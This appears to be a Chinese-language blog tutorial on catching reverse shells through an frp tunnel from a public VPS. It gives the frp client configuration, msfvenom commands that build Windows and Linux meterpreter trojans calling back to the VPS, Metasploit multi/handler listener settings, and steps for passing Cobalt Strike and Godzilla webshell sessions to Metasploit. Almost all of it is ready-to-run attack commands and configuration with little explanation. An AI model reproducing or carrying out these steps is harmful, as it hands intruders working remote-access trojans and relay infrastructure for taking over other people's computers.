0x00-引言
0x01-思路
公网vps启动frp,本地kali启动frp客户端,frp客户端配置将kali端口映射到vps某个端口,msf生成木马接收shell
0x02-msf反弹shell
01-frp配置
frp客户端配置,将本地1234端口映射到vps1080
[common]
server_addr = 1.xx.xx.xx #这里是公网vps的ip
server_port = 6666 #这里的端口要跟服务端的一样
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 1234 # 转发给本地的1234端口
remote_port = 1080 #服务端的1080端口转发给本地的1234端口
启动服务端(没截图),启动客户端
02-上线windows主机
msf生成windows木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=1080 -f exe > /root/hacker.exe
msf开启监听
msfconsole
use exploit/multi/handler #开启监听
set payload windows/meterpreter/reverse_tcp #设置payload,选择漏洞利用模块
set LHOST 127.0.0.1 #本地IP,即攻击IP
set LPORT 1234 #监听端口
exploit #攻击
windows10点击木马、成功上线
关闭木马进程
tasklist | findstr hacker
taskkill -f /pid 进程号
03-上线linux主机
msf生成linux木马
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf
开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 8888
exploit #攻击
加权限运行木马-成功上线
查找hacker服务进程并kill
0x03-cs与msf联动
CS添加监听
kali msf设置监听
msfconsole
use exploit/multi/handler #开启监听
set payload windows/meterpreter/reverse_http #设置payload,选择漏洞利用模块
set LHOST 127.0.0.1 #本地IP,即攻击IP
set LPORT 12345 #监听端口
exploit #攻击
CS中转发shell
新建会话
选择payload
MSF成功接收到shell
msf吊啊,cs的进程都给杀掉了,msf的shell还没挂
cs显示已挂
0x04-msf与哥斯拉联动
打开shell,如图
添加vps地址与端口,端口为kali映射的端口
use exploit/multi/handler #启用监听模块
set payload php/meterpreter/reverse_tcp #选择payload
set lhost 0.0.0.0
set lport 4444
run
成功
0x05-参考
https://www.bilibili.com/read/cv13762388/
http://events.jianshu.io/p/02582b971eb1